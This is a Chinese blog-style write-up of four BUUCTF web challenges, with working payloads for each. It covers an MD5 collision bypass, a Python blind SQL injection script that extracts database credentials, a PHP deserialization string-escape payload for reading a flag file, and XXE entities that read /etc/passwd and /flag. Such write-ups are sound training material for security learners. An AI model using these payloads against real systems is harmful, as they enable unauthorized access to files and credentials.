8月6日buuctf
[MRCTF2020]Ez_bypass
知识点MD5绕过,php特性
打开得到源码
I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
$id=$_GET['id'];
$gg=$_GET['gg'];
if (md5($id) === md5($gg) && $id !== $gg) {
echo 'You got the first step';
if(isset($_POST['passwd'])) {
$passwd=$_POST['passwd'];
if (!is_numeric($passwd))
{
if($passwd==1234567)
{
echo 'Good Job!';
highlight_file('flag.php');
die('By Retr_0');
}
else
{
echo "can you think twice??";
}
}
else{
echo 'You can not get it !';
}
}
else{
die('only one way to get the flag');
}
}
else {
echo "You are not a real hacker!";
}
}
else{
die('Please input first');
}
}Please input first
MD5强比较,试试数组绕过:
网上找个强绕过的值,然后passwd根据php特性传入1234567s(数据加任意字符即可)
id=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
gg=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
ok
[BJDCTF 2nd]简单注入
扫到robots.txt,发现hint.txt,打开看到
测试发现过滤 了',union,select等注入词,看看大佬的做法
用admin\来将'转义,后面就可以用整数型注入,试试or 1#,再试试or 0#
贴上代码,select被过滤了我实在想不到怎么注入得到数据,看大佬的发现直接username和password,学到了...
import requests
import time as ti
url='http://43be6073-99d9-4a0c-b28b-3a35fd75574e.node3.buuoj.cn/index.php'
result = ''
for x in range(1, 50):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
payload="or ascii(substr((database()),%d,1))>%d#"%(x,mid)
#payload="or ascii(substr((username),%d,1))>%d#"%(x,mid)
#payload="or ascii(substr((password),%d,1))>%d#"%(x,mid)
data = {
"username":"admin\\",
"password":payload
}
#print(payload)
response = requests.post(url,data=data)
if 'BJD needs to' in response.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
print(mid)
result += chr(int(mid))
print(result)
最后得到username=admin,password=OhyOuFOuNdit,登录就行啦
[安洵杯 2019]easy_serialize_php
php代码审计,反序列化
打开得到以下源码
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
f=phpinfo,在其中找到了疑似flag的文件
可以用extract($_POST)来传入我们想要的值,可以看到f=show_image时可以读取文件,但是img直接传会sha1加密,所以可以想到传SESSION的值来反序列化,由filter函数看到seesion值里有php或flag会替换掉,我们就可以将传入的值改变一下。
如我们传入payload1
_SESSION['flagflagflag']=aaaa";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:12:"flagflagflag";s:55:"aaaa";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于flag置换为空,变成了
a:4:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:12:"";s:55:"aaaa";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
其中";s:55:"aaaa部分正好12个字符,后面又有"闭合,就可以得到
array(4) {
["user"]=>
string(5) "guest"
["function"]=>
string(10) "show_image"
["";s:55:"aaaa"]=>
string(3) "aaa"
["img"]=>
string(20) "ZDBnM19mMWFnLnBocA=="
}
传入payload1,我们得到:
再将上文base64传入得到
[NCTF2019]Fake XML cookbook
xml的xxe攻击
随便输入一个账号看数据流
<user><username>admin</username><password>admin</password></user>
猜测是xxe攻击
抓包测试一下
可以读取/etc/passwd
测试命令执行
<!DOCTYPE ANY [
<!ENTITY admin SYSTEM "except://ls">
]>
<user><username>&admin;</username><password>123456</password></user>
发现不支持,最后发现是猜flag位置
最终payload
<!DOCTYPE ANY [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123456</password></user>